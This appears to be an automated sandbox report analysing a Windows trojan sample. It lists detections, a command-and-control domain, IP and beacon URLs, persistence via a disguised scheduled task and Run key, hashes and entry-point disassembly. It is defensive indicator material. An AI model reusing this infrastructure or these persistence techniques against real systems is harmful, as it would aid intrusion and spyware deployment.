                      6.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.337c67a.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      11.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37cc67a.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                      4.3.WerFault.exe.4e0000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      9.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34f0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.3.WerFault.exe.4e0000.10.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      9.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34f0000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      18.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1ef0000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      16.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3f70000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.3.WerFault.exe.4e0000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      21.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c7c67a.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      15.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.358c67a.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      8.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.11b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      21.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c30000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.3.WerFault.exe.4e0000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      5.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3a60000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      6.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.337c67a.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                      5.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3aac67a.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      20.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3ae0000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      21.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c30000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      18.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1f3c67a.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      4.3.WerFault.exe.4e0000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      18.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1f3c67a.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      11.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37cc67a.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      22.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.14fc67a.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                      17.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.13f0000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      14.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34dc67a.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      23.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1620000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      23.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1620000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                      Domains

                      SourceDetectionScannerLabelLink
                      issasname.ws0%VirustotalBrowse
                      issasname.pw2%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://issasname.ws/xyz/abc/order.php?page=330%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php1EC24CF002C20%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php?id=49235180%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php?id=14655440%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php?id=5889637F0%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php?id=8088252ZoFl0%Avira URL Cloudsafe
                      http://%s%s/image.php?id=%sRtlQueryElevationFlagsCritical0%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php?page=7-0%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php?page=700%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php?id=8314615Fv0%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.phpion0%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php?page=70%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php?page=720%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php?id=95044790%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php?page=380%Avira URL Cloudsafe
                      http://%s%s/image.php?id=%s0%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php0%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.phpO0%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php?id=49810260%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php?id=39668370%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.phpDESKTOP-0%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php?id=83146150%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php?id=5889637rivers0%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php?id=5755730%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php?page=690%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php?id=58896370%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php9p0%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php?pid=6310%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php?id=84136750%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php?pid=6680%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php?id=72770940%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php?id=80882520%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php?pid=9250%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.phpcrosoft0%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php?page=1270%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php?id=16371350%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php?id=9504479A0%Avira URL Cloudsafe
                      http://issasname.ws/xyz/abc/order.php10%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      issasname.ws
                      		64.70.19.203
                      		truetrueunknown
                      issasname.pw
                      		unknown
                      		unknowntrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://issasname.ws/xyz/abc/order.php?id=1465544true
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.php?page=33true
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.php?id=4923518true
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.php?page=70true
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.php?id=9504479true
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.phptrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.php?page=38true
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.php?id=4981026true
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.php?id=3966837true
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.php?id=8314615true
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.php?id=575573true
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.php?page=69true
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.php?id=5889637true
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.php?pid=631true
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.php?id=7277094true
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.php?id=8413675true
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.php?pid=668true
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.php?id=8088252true
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.php?pid=925true
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.php?page=127true
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.php?id=1637135true
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://issasname.ws/xyz/abc/order.php?id=5889637FWerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.php1EC24CF002C2WerFault.exe, 00000004.00000002.567116030.00000000003AF000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.php?id=8088252ZoFlWerFault.exe, 00000004.00000002.572746061.0000000004C40000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.php?page=7-WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://%s%s/image.php?id=%sRtlQueryElevationFlagsCriticalBbbEtaIxAU.exe, 00000000.00000003.303714856.0000000003450000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.316616817.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.346386030.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.340678634.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.321889200.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.392904452.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.414915674.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.387584046.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.408213818.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.436527162.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.334422756.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.365991761.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000000.304158494.0000000002860000.00000040.80000000.00040000.00000000.sdmp, WerFault.exe, 00000004.00000003.375167210.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.312736811.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.357948198.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.352061245.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.398750308.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, WerFault.exe, 00000004.00000003.381234590.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000005.00000002.572526351.0000000003A88000.00000040.00000001.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://issasname.ws/xyz/abc/order.php?id=8314615FvWerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.phpionWerFault.exe, 00000004.00000002.567116030.00000000003AF000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.php?page=7WerFault.exe, 00000004.00000002.565612970.0000000000315000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000004.00000002.567116030.00000000003AF000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.php?page=72WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://%s%s/image.php?id=%sBbbEtaIxAU.exe, 00000000.00000003.303714856.0000000003450000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, WerFault.exe, 00000004.00000003.316616817.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.346386030.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.340678634.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.321889200.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.392904452.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.414915674.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.387584046.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.408213818.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.436527162.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.334422756.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.365991761.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000000.304158494.0000000002860000.00000040.80000000.00040000.00000000.sdmp, WerFault.exe, 00000004.00000003.375167210.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.312736811.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.357948198.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.352061245.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.398750308.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, WerFault.exe, 00000004.00000003.381234590.00000000004E0000.00000004.00001000.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://issasname.ws/xyz/abc/order.phpOWerFault.exe, 00000004.00000003.436732002.00000000003AE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.phpDESKTOP-WerFault.exe, 00000004.00000003.436732002.00000000003AE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.php?id=5889637riversWerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.php9pWerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.phpcrosoftWerFault.exe, 00000004.00000002.567116030.00000000003AF000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.436732002.00000000003AE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.php1WerFault.exe, 00000004.00000003.436732002.00000000003AE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://issasname.ws/xyz/abc/order.php?id=9504479AWerFault.exe, 00000004.00000003.398882163.00000000003AD000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      64.70.19.203
                      		issasname.wsUnited States
                      		3561CENTURYLINK-LEGACY-SAVVISUStrue

                      Private

                      IP
                      192.168.2.1

                      General Information

                      Joe Sandbox Version:36.0.0 Rainbow Opal
                      Analysis ID:760719
                      Start date and time:2022-12-05 12:45:08 +01:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 9m 57s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:BbbEtaIxAU.exe
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:10
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:17
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.phis.troj.spyw.evad.winEXE@9/1@48/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 90.7% (good quality ratio 71.9%)
                      • Quality average: 56.6%
                      • Quality standard deviation: 38%
                      HCA Information:
                      • Successful, ratio: 97%
                      • Number of executed functions: 118
                      • Number of non-executed functions: 3
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                      • Excluded IPs from analysis (whitelisted): 20.112.52.29, 20.81.111.85, 20.84.181.62, 20.103.85.33, 20.53.203.50
                      • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      12:46:05Task SchedulerRun new task: Windows Update Check - 0x03C40151 path: C:\ProgramData\Quicktime s>8.5.1\yvneslhpc.exe
                      12:46:07AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Quicktime 8.5.1 "C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe"
                      12:46:09API Interceptor17x Sleep call for process: zkqrKAufFycYKMdseGdhuYpyTVNu.exe modified
                      12:46:15AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Quicktime 8.5.1 "C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe"

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      64.70.19.203GxELazkKkG.exeGet hashmaliciousBrowse
                      • enahmnhqah.ws/imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=Unk
                      Readme.exeGet hashmaliciousBrowse
                      • ersaenrnwh.ws/imgs/krewa/nqxa.php?id=50f5gzcu&s5=3159&lip=192.168.2.5&win=Unk
                      EAfIchN1gN.exeGet hashmaliciousBrowse
                      • ehmpeseeaa.ws/imgs/krewa/nqxa.php?id=5143sudk&s5=3159&lip=192.168.2.4&win=Unk
                      144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exeGet hashmaliciousBrowse
                      • xircus.ws/kin/logout.php
                      Br6Pmt0MiZ.exeGet hashmaliciousBrowse
                      • thaus.ws/6
                      R5JbUb3muW.exeGet hashmaliciousBrowse
                      • thaus.ws/6
                      kmHFEwF36g.exeGet hashmaliciousBrowse
                      • thaus.ws/1
                      VkTXaNHTs6.exeGet hashmaliciousBrowse
                      • eaffuebudbeudbbk.ws/6
                      wNtMSZRvzI.exeGet hashmaliciousBrowse
                      • eafuebdbedbedggk.ws/4
                      y7ddF1vGqA.exeGet hashmaliciousBrowse
                      • deauduafzgezzfgk.ws/3
                      6FRRo6QFF2.exeGet hashmaliciousBrowse
                      • wduufbaueeubffgu.ws/5
                      Photo-149-101.jpg.exeGet hashmaliciousBrowse
                      • 304049943.ws/mailer/3
                      winsvcs.exeGet hashmaliciousBrowse
                      • 304049943.ws/mailer/3
                      Photo-137-158.jpg.exeGet hashmaliciousBrowse
                      • 304049943.ws/mailer/3
                      9v7gUCpZOr.exeGet hashmaliciousBrowse
                      • eaffuebudbeudbbu.ws/2
                      1rP65UzlyY.exeGet hashmaliciousBrowse
                      • eaffuebudbeudbbu.ws/5
                      JAGk3xeQ5I.exeGet hashmaliciousBrowse
                      • geueudusl.ws/vnc/2
                      SecuriteInfo.com.Trojan.Siggen10.14421.6375.exeGet hashmaliciousBrowse
                      • fheuhdwdzwgzdggu.ws/2
                      SecuriteInfo.com.Trojan.Siggen10.14421.24699.exeGet hashmaliciousBrowse
                      • wduufbaueeubffgr.ws/2
                      jHbg4HhuFN.exeGet hashmaliciousBrowse
                      • deauduafzgezzfgr.ws/5

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      CENTURYLINK-LEGACY-SAVVISUSRVs7Yo67uw.elfGet hashmaliciousBrowse
                      • 205.140.253.164
                      ZG11Q8WGTS.elfGet hashmaliciousBrowse
                      • 64.242.21.142
                      SPpRmdIkFp.elfGet hashmaliciousBrowse
                      • 63.128.144.125
                      3ts2As2Bkm.exeGet hashmaliciousBrowse
                      • 192.252.154.18
                      3yjVVrgxaK.elfGet hashmaliciousBrowse
                      • 167.216.225.147
                      SI58bdp966.elfGet hashmaliciousBrowse
                      • 208.147.9.48
                      ujPxX4gJbA.elfGet hashmaliciousBrowse
                      • 216.88.116.229
                      0fmEh2zmDj.exeGet hashmaliciousBrowse
                      • 192.252.154.18
                      robinbot_sample2Get hashmaliciousBrowse
                      • 209.27.234.3
                      sora.arm.elfGet hashmaliciousBrowse
                      • 147.212.63.154
                      Yw0HhtLWAz.elfGet hashmaliciousBrowse
                      • 206.31.47.151
                      9ARcdeR3nP.elfGet hashmaliciousBrowse
                      • 64.242.21.138
                      0s41hOyQp6.elfGet hashmaliciousBrowse
                      • 208.147.9.36
                      oAUrOBvfbV.elfGet hashmaliciousBrowse
                      • 209.102.22.37
                      jew.arm7.elfGet hashmaliciousBrowse
                      • 64.41.151.59
                      brbrbr.x86.elfGet hashmaliciousBrowse
                      • 206.134.246.59
                      3y849k7eIG.elfGet hashmaliciousBrowse
                      • 216.219.107.216
                      ewfDbhCyw3.elfGet hashmaliciousBrowse
                      • 208.128.233.52
                      OnlppUfLJp.elfGet hashmaliciousBrowse
                      • 207.50.9.252
                      5WOPvndI8Z.elfGet hashmaliciousBrowse
                      • 67.130.158.88

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\89dad5d484a9f889a3a8dfca823edc3e_d06ed635-68f6-4e9a-955c-4899f5f57b9a

                      Download File
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):47
                      Entropy (8bit):1.168829563685559
                      Encrypted:false
                      SSDEEP:3:/lSll2DQi:AoMi
                      MD5:DAB633BEBCCE13575989DCFA4E2203D6
                      SHA1:33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
                      SHA-256:1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
                      SHA-512:EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
                      Malicious:false
                      Preview:........................................user.

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.917083152739634
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:BbbEtaIxAU.exe
                      File size:141312
                      MD5:0de785a3d83482ee5b7e3e396a641bc7
                      SHA1:fc7326166024e8edfec82524e4a1e98041561fa4
                      SHA256:443095db638f2eb172dbfbe3730407c033b5ec86dde1e8b2f65df703b85cca51
                      SHA512:4345256e2a5906e8e962728f8a737505a17f5c5fc4018b48cc79ef75e8bcdaf2d049e9f0828b0f2961f673c9f68f89220dab3f714b94ace5b4037b55f996362f
                      SSDEEP:3072:7jyt0PeqCxRFPTd0nnqAY6xLdzTSQh1eK0jjGoeB44R/Gzkvx:7jMoCxTPTd85XHSQbe/avIzkv
                      TLSH:5CD31211A1C487BDC33719799B73E982A6338A5D1629A42BF339CF3AFB09D71CD02065
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3v..w...w...w...~o0.t...w...~...l...t...l.>.v...Richw...................PE..L....B.R..................................... ....@

                      File Icon

                      Icon Hash:00828e8e8686b000

                      Static PE Info

                      General

                      Entrypoint:0x40120a
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Time Stamp:0x52CF42E6 [Fri Jan 10 00:46:30 2014 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:4310dad400d93b4e4f05f962e6cc9eb8

                      Entrypoint Preview

                      Instruction
                      push ebp
                      mov ebp, esp
                      push ecx
                      mov eax, dword ptr fs:[00000030h]
                      push ebx
                      push esi
                      test eax, eax
                      je 00007F3698C13928h
                      cmp byte ptr [eax+02h], 00000001h
                      je 00007F3698C13952h
                      and dword ptr [ebp-04h], 00000000h
                      call 00007F3698C13720h
                      test eax, eax
                      je 00007F3698C13945h
                      lea ecx, dword ptr [ebp-04h]
                      push ecx
                      mov esi, eax
                      call 00007F3698C13820h
                      mov ebx, eax
                      pop ecx
                      test ebx, ebx
                      je 00007F3698C13933h
                      call 00007F3698C13779h
                      test eax, eax
                      je 00007F3698C1392Ah
                      push dword ptr [ebp-04h]
                      call 00007F3698C13DBEh
                      push 00000000h
                      call dword ptr [00402000h]
                      int3
                      push ebp
                      mov ebp, esp
                      mov ecx, dword ptr [eax+14h]
                      lea edx, dword ptr [ecx-01h]
                      mov dword ptr [eax+14h], edx
                      test ecx, ecx
                      jne 00007F3698C13945h
                      mov ecx, dword ptr [eax+04h]
                      lea edx, dword ptr [ecx-01h]
                      mov dword ptr [eax+04h], edx
                      test ecx, ecx
                      jne 00007F3698C13926h
                      xor eax, eax
                      pop ebp
                      ret
                      mov ecx, dword ptr [eax]
                      movzx edx, byte ptr [ecx]
                      inc ecx
                      mov dword ptr [eax+10h], edx
                      mov dword ptr [eax], ecx
                      mov dword ptr [eax+14h], 00000007h
                      mov edx, dword ptr [eax+10h]
                      mov ecx, edx
                      add edx, edx
                      shr ecx, 07h
                      mov dword ptr [eax+10h], edx
                      mov eax, dword ptr [ebp+08h]
                      and ecx, 01h
                      mov dword ptr [eax], ecx
                      xor eax, eax
                      inc eax
                      pop ebp
                      ret
                      push ebp
                      mov ebp, esp
                      push ecx
                      push esi
                      xor esi, esi
                      inc esi
                      lea eax, dword ptr [ebp-04h]
                      push eax
                      mov eax, dword ptr [ebp+08h]
                      call 00007F3698C138C4h
                      pop ecx
                      test eax, eax
                      je 00007F3698C1394Ah
                      mov eax, dword ptr [ebp-04h]
                      lea esi, dword ptr [eax+esi*2]
                      lea eax, dword ptr [ebp-04h]
                      push eax
                      mov eax, dword ptr [ebp+08h]
                      call 00007F3698C138ADh

                      Rich Headers

                      Programming Language:
                      • [IMP] VS2008 SP1 build 30729
                      • [LNK] VS2010 SP1 build 40219

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x21400x28.rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x30000x21564.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
